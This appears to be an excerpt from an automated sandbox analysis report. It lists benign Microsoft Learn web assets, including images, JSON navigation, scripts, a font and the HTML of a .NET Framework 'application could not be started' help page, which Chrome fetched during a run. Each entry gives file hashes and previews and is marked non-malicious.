                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):4897
                                                                                                                                                                                                                                                              Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                                                                              MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                                                                              SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                                                                              SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                                                                              SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                                                                                              Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):72
                                                                                                                                                                                                                                                              Entropy (8bit):4.241202481433726
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                                                                              MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                                                                              SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                                                                              SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                                                                              SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):64291
                                                                                                                                                                                                                                                              Entropy (8bit):7.964191793580486
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                                                                                              MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                                                                                              SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                                                                                              SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                                                                                              SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
                                                                                                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1173007
                                                                                                                                                                                                                                                              Entropy (8bit):5.503893944397598
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                                                                              MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                                                                              SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                                                                              SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                                                                              SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1817143
                                                                                                                                                                                                                                                              Entropy (8bit):5.501007973622959
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                                                                              MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                                                                              SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                                                                              SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                                                                              SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1432
                                                                                                                                                                                                                                                              Entropy (8bit):4.986131881931089
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                                                                              MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                                                                              SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                                                                              SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                                                                              SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):1154
                                                                                                                                                                                                                                                              Entropy (8bit):4.59126408969148
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                                                                              MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                                                                              SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                                                                              SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                                                                              SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                                                                                              Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):19696
                                                                                                                                                                                                                                                              Entropy (8bit):7.9898910353479335
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                                                                                              MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                                                                                              SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                                                                                              SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                                                                                              SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                                                                                                              Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):33148
                                                                                                                                                                                                                                                              Entropy (8bit):4.917595394577667
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                                                                                              MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                                                                                              SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                                                                                              SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                                                                                              SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                                                                                              Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):35005
                                                                                                                                                                                                                                                              Entropy (8bit):7.980061050467981
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                                                                              MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                                                                              SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                                                                              SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                                                                              SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):13842
                                                                                                                                                                                                                                                              Entropy (8bit):7.802399161550213
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                                                                              MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                                                                              SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                                                                              SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                                                                              SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):4897
                                                                                                                                                                                                                                                              Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                                                                              MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                                                                              SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                                                                              SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                                                                              SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):47062
                                                                                                                                                                                                                                                              Entropy (8bit):5.016115705165622
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                                                                                              MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                                                                                                              SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                                                                                                              SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                                                                                                              SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
